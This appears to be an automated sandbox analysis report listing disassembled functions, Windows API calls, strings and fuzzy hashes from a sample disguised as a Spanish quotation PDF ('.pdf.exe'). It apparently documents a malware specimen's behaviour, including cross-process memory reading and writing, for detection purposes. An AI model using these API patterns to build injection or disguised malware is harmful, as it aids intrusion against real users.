Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 4e1ceb23e99a08c289caafd169663ea89dd67c7478e80f44a51d97d11ca74cc8
Instruction ID: 0b1b63c10fddc1efc166d923eb1ec6a429713f2aad423c1f4f40aaed1a8c7886
Opcode Fuzzy Hash: 4e1ceb23e99a08c289caafd169663ea89dd67c7478e80f44a51d97d11ca74cc8
Instruction Fuzzy Hash: 45013175100205BFDB114FA5EC4DE6A3F6EEF86360B644466FA45D7360DB31DC509A60

Function 00260FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00260FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00260FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00260FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00260FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00261002

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 6b214fbbcc12c6bf053dcc2575c473edb013fc0c9cfaf5972b87519f1d050ea6
Instruction ID: 3251767191968887db474aab3a23453d8f1856257cea2e6590ff570127214e5e
Opcode Fuzzy Hash: 6b214fbbcc12c6bf053dcc2575c473edb013fc0c9cfaf5972b87519f1d050ea6
Instruction Fuzzy Hash: C2F06235100351EBDB215FA4EC4DF563B6DEF89762F644415FD49C7261CA70EC908A70

Function 00261014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0026102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00261036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00261045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0026104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00261062

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 25b50366e9e076da081200e36531b4de69d1d96b7cb74ef99adccc48ff9bc2cc
Instruction ID: db2c28fef6b5d4d6b6316c5f0f159e21b064a7dd574830dc5c21447270632193
Opcode Fuzzy Hash: 25b50366e9e076da081200e36531b4de69d1d96b7cb74ef99adccc48ff9bc2cc
Instruction Fuzzy Hash: DDF06235100321EBDB215FA4EC4DF563B6DEF89761F340415FD45C7260CA70E8908A70

Function 0027030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,0027017D,?,002732FC,?,00000001,00242592,?), ref: 00270324
CloseHandle.KERNEL32(?,?,?,?,0027017D,?,002732FC,?,00000001,00242592,?), ref: 00270331
CloseHandle.KERNEL32(?,?,?,?,0027017D,?,002732FC,?,00000001,00242592,?), ref: 0027033E
CloseHandle.KERNEL32(?,?,?,?,0027017D,?,002732FC,?,00000001,00242592,?), ref: 0027034B
CloseHandle.KERNEL32(?,?,?,?,0027017D,?,002732FC,?,00000001,00242592,?), ref: 00270358
CloseHandle.KERNEL32(?,?,?,?,0027017D,?,002732FC,?,00000001,00242592,?), ref: 00270365

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: ccc7fa50f1316306eef59f1009c0b3c222c593b0c4f8fe7a06a1b5037aa2d5d7
Instruction ID: 509be07a3e872c0e1397f36be1dea457f5c83ea7abfab80b98828072c3a8ae89
Opcode Fuzzy Hash: ccc7fa50f1316306eef59f1009c0b3c222c593b0c4f8fe7a06a1b5037aa2d5d7
Instruction Fuzzy Hash: 91019072810B16DFC730AF66D8C0416F7F5BE502153158A7FD19A52931C371A968CE80

Function 0023D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0023D752

Part of subcall function 002329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0023D7D1,00000000,00000000,00000000,00000000,?,0023D7F8,00000000,00000007,00000000,?,0023DBF5,00000000), ref: 002329DE
Part of subcall function 002329C8: GetLastError.KERNEL32(00000000,?,0023D7D1,00000000,00000000,00000000,00000000,?,0023D7F8,00000000,00000007,00000000,?,0023DBF5,00000000,00000000), ref: 002329F0

_free.LIBCMT ref: 0023D764
_free.LIBCMT ref: 0023D776
_free.LIBCMT ref: 0023D788
_free.LIBCMT ref: 0023D79A

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 131dbb06f39b34010bde826ed701e5815cea5991c16c9117c6257e1c519eca5a
Instruction ID: f15df19ae0b37225785fd05ca6389c88596c77b29adc1f9c46f6184b5093899d
Opcode Fuzzy Hash: 131dbb06f39b34010bde826ed701e5815cea5991c16c9117c6257e1c519eca5a
Instruction Fuzzy Hash: F2F012B2564215EB8621EF64F9C6D16B7DDBB44710FB41845F048D7501C731FCA08A64

Function 002322A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 002322BE

Part of subcall function 002329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0023D7D1,00000000,00000000,00000000,00000000,?,0023D7F8,00000000,00000007,00000000,?,0023DBF5,00000000), ref: 002329DE
Part of subcall function 002329C8: GetLastError.KERNEL32(00000000,?,0023D7D1,00000000,00000000,00000000,00000000,?,0023D7F8,00000000,00000007,00000000,?,0023DBF5,00000000,00000000), ref: 002329F0

_free.LIBCMT ref: 002322D0
_free.LIBCMT ref: 002322E3
_free.LIBCMT ref: 002322F4
_free.LIBCMT ref: 00232305

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8cd0d55f95883b435f7eb0d46d6269f9a29407501ca29b6ccf705b3a50172a6d
Instruction ID: ab729723773d0fe5dc969c45013893506e0fe0a8491e6cc212fafbd9483732a9
Opcode Fuzzy Hash: 8cd0d55f95883b435f7eb0d46d6269f9a29407501ca29b6ccf705b3a50172a6d
Instruction Fuzzy Hash: 91F03AF4C22130DB8712AF54BC49A0D3B64F718760F21164BF818D26B1CB310C36AFA4

Function 002195C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 002195D4
StrokeAndFillPath.GDI32(?,?,002571F7,00000000,?,?,?), ref: 002195F0
SelectObject.GDI32(?,00000000), ref: 00219603
DeleteObject.GDI32 ref: 00219616
StrokePath.GDI32(?), ref: 00219631

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 61ec557291abd8b15b28df1d2ff84869c7ab202c4036eb3b78ff37948d49ae02
Instruction ID: bf30ea66885aa2819a577e4efc7c54c863f172582468549f489ff2581c6aaedc
Opcode Fuzzy Hash: 61ec557291abd8b15b28df1d2ff84869c7ab202c4036eb3b78ff37948d49ae02
Instruction Fuzzy Hash: D4F01430416289FBDB225F69FD2CBE83BA5AB10322F148216F429654F1C73089F5DF24

Function 00230F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 002310F9
__freea.LIBCMT ref: 00231117

Part of subcall function 00231537: _free.LIBCMT ref: 0023154F

Strings

am/pm, xrefs: 0023117A
a/p, xrefs: 002311DE

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 004ebeb0e593c18c5fbddd6992ad1059cbb6b66f8e334849e6f4c805b6fecc10
Instruction ID: 3581e63f2778e45f1b7725d4a045188c2fd23ef9e609f7192f0cb34b043cc75c
Opcode Fuzzy Hash: 004ebeb0e593c18c5fbddd6992ad1059cbb6b66f8e334849e6f4c805b6fecc10
Instruction Fuzzy Hash: 62D112B1930207DACB289F68C895BFEB7B0FF05300F284199E945AB654D7759DB0CB91

Function 002861D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON

Download Yara Rule

APIs

Part of subcall function 00220242: EnterCriticalSection.KERNEL32(002D070C,002D1884,?,?,0021198B,002D2518,?,?,?,002012F9,00000000), ref: 0022024D
Part of subcall function 00220242: LeaveCriticalSection.KERNEL32(002D070C,?,0021198B,002D2518,?,?,?,002012F9,00000000), ref: 0022028A

Part of subcall function 002200A3: __onexit.LIBCMT ref: 002200A9

__Init_thread_footer.LIBCMT ref: 00286238

Part of subcall function 002201F8: EnterCriticalSection.KERNEL32(002D070C,?,?,00218747,002D2514), ref: 00220202
Part of subcall function 002201F8: LeaveCriticalSection.KERNEL32(002D070C,?,00218747,002D2514), ref: 00220235

Part of subcall function 0027359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 002735E4
Part of subcall function 0027359C: LoadStringW.USER32(002D2390,?,00000FFF,?), ref: 0027360A

Strings

x#-, xrefs: 0028633A
x#-, xrefs: 0028636F
x#-, xrefs: 00286353

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
String ID: x#-$x#-$x#-
API String ID: 1072379062-1822726949
Opcode ID: 85b99ce25bb7419f730f455e65f90348d9f722a430a7a5cf7d88b5ca6b225e37
Instruction ID: b5c4cd8e3f80d845fb3a89d741a455889cd1c1ece260a2cb48912ba5744ad275
Opcode Fuzzy Hash: 85b99ce25bb7419f730f455e65f90348d9f722a430a7a5cf7d88b5ca6b225e37
Instruction Fuzzy Hash: 0DC1A375A10206AFDB14EF58C894EBEB7B9FF48300F148059F9059B291DB74ED64CB90

Function 00238A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00238B6E
GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00238B7A
__dosmaperr.LIBCMT ref: 00238B81

Strings

.", xrefs: 00238A63

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr
String ID: ."
API String ID: 2434981716-2093358890
Opcode ID: 60882213dc8e3557100df9f790f1c3c1bb14bfcd92b1d318ae5569eae76b6729
Instruction ID: 6105980cbbdca90ee9d892d501d3d830ca170c51535640645a02dac62aa0a29c
Opcode Fuzzy Hash: 60882213dc8e3557100df9f790f1c3c1bb14bfcd92b1d318ae5569eae76b6729
Instruction Fuzzy Hash: A14180F0624246AFD7249F24D884A79BFE6DB46304F3845AAF898CF552DE318C228750

Function 00262716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0026B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002621D0,?,?,00000034,00000800,?,00000034), ref: 0026B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00262760

Part of subcall function 0026B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002621FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0026B3F8

Part of subcall function 0026B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0026B355
Part of subcall function 0026B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00262194,00000034,?,?,00001004,00000000,00000000), ref: 0026B365
Part of subcall function 0026B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00262194,00000034,?,?,00001004,00000000,00000000), ref: 0026B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002627CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0026281A

Strings

@, xrefs: 00262832

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: e4d89117710ae9d3b2ceb7f48b5368974e8fa4453271c1fb99557c8815d2747d
Instruction ID: 4e5417268a4c32265e8c203885e0d42b02e199a459102ab807b80ff58fa6678b
Opcode Fuzzy Hash: e4d89117710ae9d3b2ceb7f48b5368974e8fa4453271c1fb99557c8815d2747d
Instruction Fuzzy Hash: 08413D72910218AFDB11DFA4CD45EEEBBB8AF05300F104095FA55B7181DB706E99CF60

Function 0023172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe,00000104), ref: 00231769
_free.LIBCMT ref: 00231834
_free.LIBCMT ref: 0023183E

Strings

C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe, xrefs: 00231760, 00231767, 00231796, 002317CE

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe
API String ID: 2506810119-993264301
Opcode ID: 596269b4fa11b62cd43f88a963e00c4f6a3f055e59563d6e0c506c9e15c384e5
Instruction ID: 139992b7c1676e07944b14adf23dc799cbcbcd58d69c54c13fc82b1f47fdf052
Opcode Fuzzy Hash: 596269b4fa11b62cd43f88a963e00c4f6a3f055e59563d6e0c506c9e15c384e5
Instruction Fuzzy Hash: 32316FB5E10219FBDB21DF99AC89D9EBBBCEB85310F144167F80497211D7708E60CB94

Function 0026C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0026C306
DeleteMenu.USER32(?,00000007,00000000), ref: 0026C34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,002D1990,01575A28), ref: 0026C395

Strings

0, xrefs: 0026C2DF

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 6f602573821ab67190c5e8c572f04eb5ae803f698048bd10b05f95532c5117da
Instruction ID: 807012d830dc4dfa3581eb216c67dbc61517a689edcbd6aea7832aaa01f7bd04
Opcode Fuzzy Hash: 6f602573821ab67190c5e8c572f04eb5ae803f698048bd10b05f95532c5117da
Instruction Fuzzy Hash: 4E41C731114302DFD720EF24D844B2ABBE4AF85310F20865EF9A5973D1D770E9A4CB62

Function 00294416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0029CC08,00000000,?,?,?,?), ref: 002944AA
GetWindowLongW.USER32 ref: 002944C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 002944D7

Strings

SysTreeView32, xrefs: 0029447C

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 7eae9673e61e2f36813e3e38c4177d4a7acfa3f38a5e11238d1ebd2850583d56
Instruction ID: d8a730d2b9d3721e8df1591b2a85668161b34110140319f5c99a73e4276d1279
Opcode Fuzzy Hash: 7eae9673e61e2f36813e3e38c4177d4a7acfa3f38a5e11238d1ebd2850583d56
Instruction Fuzzy Hash: 6131B031220206AFDF209E78DC45FEA77A9EB08334F214719F979921D0D770EC619B50

Function 00266E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

SysReAllocString.OLEAUT32(?,?), ref: 00266EED
VariantCopyInd.OLEAUT32(?,?), ref: 00266F08
VariantClear.OLEAUT32(?), ref: 00266F12

Strings

*j&, xrefs: 00266E8B, 00266E90, 00266EF8

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Variant$AllocClearCopyString
String ID: *j&
API String ID: 2173805711-2273582324
Opcode ID: 8890774658fd96a69fc2f62a809897bda00584e071765a15fd61e449ed8a28c1
Instruction ID: 69c7a3dab869f6f8b4896d7c1397c9ccf936b401010b5849e9e1d047b5afc20a
Opcode Fuzzy Hash: 8890774658fd96a69fc2f62a809897bda00584e071765a15fd61e449ed8a28c1
Instruction Fuzzy Hash: 69318F71624345DBCB05AFA4E8999BD37B6EF85304F2004ADF9034B6A2CB749DA1DB90

Function 0028304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0028335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00283077,?,?), ref: 00283378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0028307A
_wcslen.LIBCMT ref: 0028309B
htons.WSOCK32(00000000,?,?,00000000), ref: 00283106

Strings

255.255.255.255, xrefs: 00283095, 0028309A

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 81b91fb9e6a5c68f36b6fff8bb4a5231565e5c7fa73d2aabbe78ad724e2aa9ea
Instruction ID: ec1866cbcd616507665ed6ab4ebc447d1a832b580c808d735a16e87cc28a8481
Opcode Fuzzy Hash: 81b91fb9e6a5c68f36b6fff8bb4a5231565e5c7fa73d2aabbe78ad724e2aa9ea
Instruction Fuzzy Hash: 4231073D611202DFCB10EF28C489EAA77E0EF14B14F248059E8168B7D2DB72EE55CB60

